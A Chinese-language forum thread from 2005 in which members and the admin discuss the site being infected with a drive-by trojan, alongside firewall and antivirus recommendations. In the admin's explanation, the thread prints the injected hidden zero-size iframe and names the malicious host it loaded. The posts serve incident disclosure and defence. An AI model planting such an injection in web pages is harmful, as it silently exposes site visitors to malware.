本站被植入木馬? |
|
P.D.
版主 發表:603 回覆:4038 積分:3874 註冊:2006-10-31 發送簡訊給我 |
|
blueK
初階會員 發表:19 回覆:62 積分:36 註冊:2004-05-06 發送簡訊給我 |
|
huwk
資深會員 發表:26 回覆:340 積分:323 註冊:2002-04-03 發送簡訊給我 |
我試了一下果然如同QOO1234與PD所言,是有些異常!
用http://www.filseclab.com/cht/去常駐,再開網頁真的會跑出警告!
對HDD SCAN也會有他的暫存警告~不過因為沒有註冊,無法列出中毒的檔案,所以也不知道實際狀況是如何。PS在這同時使用微軟的AntiSpyware去SCAN.一點反應也沒有! 而看了一下,實際會發出警告的網頁是http://www.650411.net/taiwan/default.htm中的,其中的JAVASCRIPT含有存取"主動式內容"的CODE..@@~~ 發表人 - huwk 於 2005/11/23 21:51:46
------
熊的學習 http://huwk.blogspot.com |
enter2004
初階會員 發表:51 回覆:94 積分:34 註冊:2005-04-10 發送簡訊給我 |
|
enter2004
初階會員 發表:51 回覆:94 積分:34 註冊:2005-04-10 發送簡訊給我 |
|
ANDY8C
資深會員 發表:114 回覆:582 積分:299 註冊:2006-10-29 發送簡訊給我 |
|
huwk
資深會員 發表:26 回覆:340 積分:323 註冊:2002-04-03 發送簡訊給我 |
剛才查看了一下若你用FIREFOX好像比較安全!因為他會判別你是不是IE6 @@~
解出來JAVASCRIPT包的CODE如下.有興趣的朋友看看囉~也希望對大家的復原有幫助!
PS有點亂.沒整理
<HTML> <BODY>發表人 - huwk 於 2005/11/23 22:14:57
------
熊的學習 http://huwk.blogspot.com |
qoo1234
版主 發表:256 回覆:1167 積分:659 註冊:2003-02-24 發送簡訊給我 |
|
ddy
站務副站長 發表:262 回覆:2105 積分:1169 註冊:2002-07-13 發送簡訊給我 |
|
aelly.mailbox
一般會員 發表:0 回覆:1 積分:0 註冊:2003-10-23 發送簡訊給我 |
|
blueK
初階會員 發表:19 回覆:62 積分:36 註冊:2004-05-06 發送簡訊給我 |
|
neoart
版主 發表:22 回覆:582 積分:425 註冊:2003-05-09 發送簡訊給我 |
|
conundrum
尊榮會員 發表:893 回覆:1272 積分:643 註冊:2004-01-06 發送簡訊給我 |
原來PD兄 也是使用 費爾個人防火牆
不知是那個版本 如果可以是否 可以提供 防火牆設定的概要或範本
因為我都是設定 連出連入尋問 不知PD兄是否也是與庵一樣的設定
引言: 【分享】免費的 防火牆 繁體 http://delphi.ktop.com.tw/topic.php?TOPIC_ID=81390網友大大 請問你的作品,文章等 是否願意貢獻 給於KTOP網站,日後使用於DVD/VCD發售 如果可以請在簽名檔上宣告個人授權 以加速KTOP網站日後DVD/VCD資料的誕生 台灣災難都是事後算帳 無人飛行載具(Unmanned Aerial Vehicle,UAV)為什麼沒大量應用於救災行列 絲絲有2種 .net有很多種 一種治眼睛是MS 另一種治腦筋是Borland |
P.D.
版主 發表:603 回覆:4038 積分:3874 註冊:2006-10-31 發送簡訊給我 |
引言: 原來PD兄 也是使用 費爾個人防火牆 不知是那個版本 如果可以是否 可以提供 防火牆設定的概要或範本 因為我都是設定 連出連入尋問 不知PD兄是否也是與庵一樣的設定我使用的不是費爾的防火牆, 而是同一家公司的費爾托斯系統, 其本身具有防 駭, 防毒, 防木馬的功能, 使用上還算不錯, 這套是要$$, 但不貴, 可以上 www.softking.com.tw 查詢, 我喜歡的原因主要是他們在設計版權的做法非常 合情合理, 而且不分server, client都可以用, 在攔截上我每一家客戶都有裝, 至目前為止還沒有聽說有被入侵的。 而費爾的防火牆我使用過, 說實在話並不好用, 因為如果你設計偵測上以詢問為 主時, 十次連線有5,6次會被詢問是否開放, 不勝其擾, 而對一般的用戶來說也 略嫌複雜了點, 如果是預設被拒絶的話, 很多要通過Internet的都過不去, 事後 還要一一去調整, 防火牆我用過的KasperSky(卡巴斯基)是蠻好的一套, Panda的 也還ok, Pccillin的算了吧! 發表人 - P.D. 於 2005/11/24 21:48:50 |
roller
一般會員 發表:9 回覆:20 積分:5 註冊:2004-11-05 發送簡訊給我 |
|
conundrum
尊榮會員 發表:893 回覆:1272 積分:643 註冊:2004-01-06 發送簡訊給我 |
多謝PD兄的回應 再請問一下 PD兄 是否有玩過以下軟體
【轉貼】SoftEther(虛擬網卡)v2.0 Beta3
http://delphi.ktop.com.tw/topic.php?TOPIC_ID=80060
【轉貼】SoftEther 1.0(虛擬網卡)
http://delphi.ktop.com.tw/topic.php?TOPIC_ID=80073 網友大大
請問你的作品,文章等 是否願意貢獻 給於KTOP網站,日後使用於DVD/VCD發售
如果可以請在簽名檔上宣告個人授權
以加速KTOP網站日後DVD/VCD資料的誕生
台灣災難都是事後算帳
無人飛行載具(Unmanned Aerial Vehicle,UAV)為什麼沒大量應用於救災行列 絲絲有2種
.net有很多種 一種治眼睛是MS 另一種治腦筋是Borland
|
P.D.
版主 發表:603 回覆:4038 積分:3874 註冊:2006-10-31 發送簡訊給我 |
|
領航天使
站長 發表:12216 回覆:4186 積分:4084 註冊:2001-07-25 發送簡訊給我 |
很抱歉,因為站長出國一個星期,回國後才獲知這個消息!
對於造成各位網友的困擾,在此鄭重道歉!
這個病毒暫時清除!
他的手法是搜尋.HTM/.HTML/.ASP/.PHP等Script程式檔案
找到 < / body > 語法處 , 在前面加上
< i frame src="http://fucktw.go.3322.org" width=0 height=0> < / iframe>
讓本站網頁導入fucktw.go.3322.org這個病毒網頁中 目前本站採取了一些防範措施,希望能奏效,
猜測是利用IIS的漏洞進來的! 本站對此人的行為表示嚴厲的譴責,
並且已經保留相關證據,
保留日後的法律追究權利! 再次感謝各位熱心的協助! 站長敬上 ~~~Delphi K.Top討論區站長~~~
------
~~~Delphi K.Top討論區站長~~~ |
folkchen
高階會員 發表:9 回覆:232 積分:173 註冊:2003-10-09 發送簡訊給我 |
引言: 很抱歉,因為站長出國一個星期,回國後才獲知這個消息! 對於造成各位網友的困擾,在此鄭重道歉! 這個病毒暫時清除! 他的手法是搜尋.HTM/.HTML/.ASP/.PHP等Script程式檔案 找到 < / body > 語法處 , 在前面加上 < i frame src="http://fucktw.go.3322.org" width=0 height=0> < / iframe> 讓本站網頁導入fucktw.go.3322.org這個病毒網頁中 目前本站採取了一些防範措施,希望能奏效, 猜測是利用IIS的漏洞進來的! 本站對此人的行為表示嚴厲的譴責, 並且已經保留相關證據, 保留日後的法律追究權利! 再次感謝各位熱心的協助! 站長敬上 ~~~Delphi K.Top討論區站長~~~我自己的一個論壇是XOOPS2做的也發生過同樣的問題 但那是PHP MYSQL做的 所以應該不是利用IIS的漏洞進來的 不知道他是怎麼弄 |
本站聲明 |
1. 本論壇為無營利行為之開放平台,所有文章都是由網友自行張貼,如牽涉到法律糾紛一切與本站無關。 2. 假如網友發表之內容涉及侵權,而損及您的利益,請立即通知版主刪除。 3. 請勿批評中華民國元首及政府或批評各政黨,是藍是綠本站無權干涉,但這裡不是政治性論壇! |